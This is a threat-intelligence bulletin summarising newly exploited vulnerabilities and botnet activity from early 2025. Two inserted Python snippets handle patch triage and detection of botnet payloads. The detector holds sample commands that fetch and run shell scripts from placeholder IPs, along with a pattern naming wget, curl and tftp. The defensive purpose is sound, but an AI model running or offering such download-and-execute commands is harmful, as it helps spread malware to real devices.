Executive Summary
A robust start to 2025: CISA has updated its KEV catalog with four critical vulnerabilities. Two of them affect Mitel products, one affects Oracle WebLogic, and the fourth is a zero-day in Ivanti Connect Secure. Separately, active exploitation of a critical flaw in GFI KerioControl firewalls highlights the urgent need for organizations to prioritize patching and strengthen defenses against rapidly evolving threats.
Botnet activity continues to rise, with emerging threats such as Zerobot exploiting vulnerabilities in Tenda Wi-Fi routers and Andoryu targeting GitLab. IoT-focused botnets such as IoT Reaper and AndroxGh0st persist in attacking Cisco routers and PHPUnit, while legacy botnets such as Mirai and Tsunami continue to exploit an eight-year-old flaw in the Eir D1000 modem, underscoring the risk posed by outdated and unsupported infrastructure.
Mandiant's investigation also revealed deployment of the SPAWN malware ecosystem on Ivanti Connect Secure appliances. The Gayfemboy botnet, exploiting a zero-day in Four-Faith routers, has grown into a 15,000-node network and amplifies its DDoS capabilities by abusing other vulnerabilities and weak Telnet credentials. A PHP vulnerability has also been leveraged to deploy the PacketCrypt Classic cryptocurrency miner.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insight into the latest emerging and widely discussed threats, helping defenders make informed prioritization decisions.
A critical stack-based buffer overflow vulnerability in Ivanti Connect Secure allows remote unauthenticated attackers to execute arbitrary code. Affected versions include Ivanti Connect Secure prior to 22.7R2.5, Policy Secure prior to 22.7R1.2, and Neurons for ZTA Gateways prior to 22.7R2.3. Ivanti confirmed limited exploitation of Connect Secure appliances as a zero-day (CVE-2025-0282), while no exploitation has been observed against Policy Secure or ZTA Gateways. Recognizing the critical nature of this issue, the Cybersecurity and Infrastructure Security Agency (CISA) has added it to its Known Exploited Vulnerabilities (KEV) catalog, urging organizations to prioritize mitigation efforts.
A path traversal vulnerability has been identified in Mitel MiCollab, a unified communications solution that integrates chat, voice, video, and SMS messaging with Microsoft Teams. This flaw allows attackers with administrative privileges to read local files on the MiCollab server, potentially exposing sensitive information. The vulnerability affects versions 9.8 SP1 FP2 (9.8.1.201) and earlier, emphasizing the importance of timely updates. The flaw has been added to the CISA KEV catalog, urging immediate patching.
A path traversal vulnerability has been discovered in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab, stemming from insufficient input validation. It affects versions 9.8 SP1 FP2 (9.8.1.201) and earlier and enables attackers to access files they are not authorized to read. With a proof-of-concept (PoC) exploit publicly available, this issue poses a significant security risk. Highlighting its critical nature, CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog.
A 1-click remote code execution vulnerability in the web interface of GFI KerioControl firewalls is being actively exploited by threat actors. Using specially crafted malicious URLs, attackers can compromise systems running versions 9.2.5 through 9.4.5. To address this critical flaw, GFI Software has released version 9.4.5 Patch 1. Censys data as of January 7 reveals 23,862 exposed KerioControl instances globally, with 17% geolocated in Iran, emphasizing the urgent need for immediate patching to mitigate this actively exploited threat.
A deserialization of untrusted data vulnerability in Oracle WebLogic Server allows attackers to execute code remotely on affected systems. Rated critical with a CVSS score of 9.8, this five-year-old flaw continues to pose a significant threat to one of the most widely used application servers. The availability of a proof-of-concept (PoC) exploit underscores the urgency of remediation. Highlighting its exploitation potential, CISA has added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog.
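As an added patch-triage check that is not part of this bulletin, the following Python encodes the affected version ranges stated above (Oracle WebLogic is omitted because the bulletin gives no version range for it) and flags inventory entries that still need patching. The product names used as keys, the constructed inventory, and the assumption that Ivanti's "22.7R2.5"-style versions order purely by their numeric fields are this example's own.

```python
from __future__ import annotations
import re

# Affected ranges as stated in this bulletin, as (inclusive low, inclusive high, first fixed);
# None means no bound on that side. Oracle WebLogic is omitted: no version range is given.
ADVISORIES = {
    "Ivanti Connect Secure": (None, None, "22.7R2.5"),
    "Ivanti Policy Secure": (None, None, "22.7R1.2"),
    "Ivanti Neurons for ZTA Gateways": (None, None, "22.7R2.3"),
    "Mitel MiCollab": (None, "9.8.1.201", None),
    "GFI KerioControl": ("9.2.5", "9.4.5", "9.4.5 Patch 1"),
}

# Constructed inventory, not real hosts.
SAMPLE_INVENTORY = [
    ("vpn-1", "Ivanti Connect Secure", "22.7R2.4"),
    ("vpn-2", "Ivanti Connect Secure", "22.7R2.5"),
    ("uc-1", "Mitel MiCollab", "9.8.1.201"),
    ("fw-1", "GFI KerioControl", "9.4.5 Patch 1"),
    ("fw-2", "GFI KerioControl", "9.3.0"),
]


def parse_version(v: str) -> tuple[int, ...]:
    """'22.7R2.5' -> (22, 7, 2, 5); '9.8.1.201' -> (9, 8, 1, 201); '9.4.5 Patch 1' -> (9, 4, 5, 1).
    Assumption: Ivanti 'R' releases order by their numeric fields, so a digit split suffices."""
    return tuple(int(x) for x in re.findall(r"\d+", v))


def compare(a: str, b: str) -> int:
    """-1, 0 or 1; shorter tuples are right-padded with zeros so '9.4.5' < '9.4.5 Patch 1'."""
    pa, pb = parse_version(a), parse_version(b)
    n = max(len(pa), len(pb))
    pa, pb = pa + (0,) * (n - len(pa)), pb + (0,) * (n - len(pb))
    return (pa > pb) - (pa < pb)


def is_vulnerable(product: str, version: str) -> bool:
    """True if the installed version falls inside the bulletin's affected range."""
    low, high, fixed = ADVISORIES[product]  # KeyError for products the bulletin does not cover
    if fixed is not None and compare(version, fixed) >= 0:
        return False
    if low is not None and compare(version, low) < 0:
        return False
    if high is not None and compare(version, high) > 0:
        return False
    return True


def prioritize(inventory: list[tuple[str, str, str]]) -> list[tuple[str, str, str]]:
    """Filter (host, product, version) entries to those still exposed, for patch triage."""
    return [(h, p, v) for h, p, v in inventory if p in ADVISORIES and is_vulnerable(p, v)]
```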
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insight into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
Identified vulnerabilities exploited by botnets, including recent CVEs logged in MISP. Presented here are the top 5 CVEs whose payloads are suggestive of botnet activity, such as invoking wget with a bare IP address.
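The "wget with IP addresses" heuristic mentioned above, as an added example that is not part of this bulletin or of Loginsoft's own tooling: it scans constructed sensor records for download commands that fetch from a bare IPv4 literal and ranks signature ids by hit count. The signature ids and sample payloads are constructed placeholders standing in for the CVE tags and request bodies a sensor would record.

```python
from __future__ import annotations
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# A download tool followed, within the same shell command, by a bare IPv4 literal.
# Hostname URLs deliberately do not match: botnet stagers usually fetch from raw IPs.
_DOWNLOAD_FROM_IP = re.compile(
    r"\b(wget|curl|tftp|ftpget)\b[^;|&]*?\b((?:\d{1,3}\.){3}\d{1,3})\b", re.IGNORECASE
)

# Constructed sample records, not real sensor telemetry: (signature_id, raw payload).
# Signature ids are placeholders for the CVE tags a sensor would attach; addresses are TEST-NET.
SAMPLE_RECORDS = [
    ("sig-A", "cmd=cd /tmp; wget http://203.0.113.5/bot.sh; sh bot.sh"),
    ("sig-A", "cmd=cd%20/tmp%3B%20curl%20-O%20http%3A%2F%2F198.51.100.7%2Fx"),
    ("sig-A", "cmd=busybox wget http://203.0.113.5/arm7 -O /tmp/a"),
    ("sig-B", "pkg=http://updates.example.com/pkg.tar.gz"),  # hostname, not an IP
    ("sig-B", "host=ping 203.0.113.1"),                       # IP, but no download tool
    ("sig-C", "cmd=tftp -g -r bot 203.0.113.9"),
    ("sig-D", "q=search"),
]


def botnet_indicators(payload: str) -> list[tuple[str, str]]:
    """Return (tool, ip) for each download-from-IP command; decodes twice so
    single- and double-URL-encoded payloads normalise to the same plaintext."""
    decoded = unquote(unquote(payload))
    return [(m.group(1).lower(), m.group(2)) for m in _DOWNLOAD_FROM_IP.finditer(decoded)]


def top_signatures(records, n: int = 5) -> list[tuple[str, int]]:
    """Rank signature ids by the number of their payloads carrying botnet indicators."""
    hits = Counter(sig for sig, payload in records if botnet_indicators(payload))
    return hits.most_common(n)


def stager_hosts(records) -> dict[str, set[str]]:
    """Collect, per signature, the IP literals its payloads download from."""
    hosts: dict[str, set[str]] = defaultdict(set)
    for sig, payload in records:
        for _tool, ip in botnet_indicators(payload):
            hosts[sig].add(ip)
    return dict(hosts)


if __name__ == "__main__":
    hosts = stager_hosts(SAMPLE_RECORDS)
    for sig, count in top_signatures(SAMPLE_RECORDS):
        print(f"{sig}: {count} botnet-style payload(s), fetching from {sorted(hosts[sig])}")
```

The IP literals collected by stager_hosts are the values worth feeding into blocklists and retro-hunts, since a single stager host usually serves many CVE-specific payloads.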
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities targeted by adversaries. Each vulnerability is manually analyzed and mapped to MITRE ATT&CK tactics and techniques. The information is drawn from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
Google-owned Mandiant has confirmed zero-day exploitation of CVE-2025-0282 starting in mid-December 2024, targeting Ivanti Connect Secure appliances in multiple organizations. In one analyzed instance, the SPAWN malware ecosystem, comprising SPAWNANT, SPAWNMOLE and SPAWNSNAIL, was identified. The activity is attributed to UNC5337, assessed with moderate confidence to be part of UNC5221. The attacks also introduced two previously undocumented malware families, DRYHOOK and PHASEJAM, which remain unattributed to any known threat actor.
A critical OS command injection vulnerability in PHP was exploited to deploy the PacketCrypt Classic cryptocurrency miner, as reported by the SANS Internet Storm Center. Discovered by Orange Tsai in June 2024, the vulnerability was later demonstrated in a proof of concept by watchTowr Labs. It has since been leveraged by various threat actors, including AndroxGh0st, Ghost RAT and the TellYouThePass ransomware, marking its continued use in malicious campaigns.
Gayfemboy Botnet: A sophisticated DDoS threat
XLab has issued a report on the Gayfemboy botnet, an emerging and formidable threat exploiting a zero-day vulnerability in Four-Faith industrial routers. Originally a small variant of the notorious Mirai malware, Gayfemboy has evolved into a large-scale botnet, with over 15,000 active nodes engaged in Distributed Denial-of-Service (DDoS) attacks. In addition to exploiting the zero-day, the botnet also takes advantage of other vulnerabilities and weak Telnet credentials, significantly enhancing its attack capabilities.
PRE-NVD observed for this week
Pre-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts, with plans to expand coverage.
External References
- https://www.cisa.gov/news-events/alerts/2025/01/08/cisa-adds-one-vulnerability-kev-catalog
- https://www.cisa.gov/news-events/alerts/2025/01/07/cisa-adds-three-known-exploited-vulnerabilities-catalog
- https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day/
- https://blog.xlab.qianxin.com/gayfemboy-en/
- https://isc.sans.edu/diary/31564
- https://social.cyware.com/news/zerobot-operators-expand-attack-scope-with-new-exploits-and-ddos-methods-61301c69
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-016a
- https://blog.apnic.net/2021/12/23/preparing-for-the-next-large-scale-iot-botnet-attack/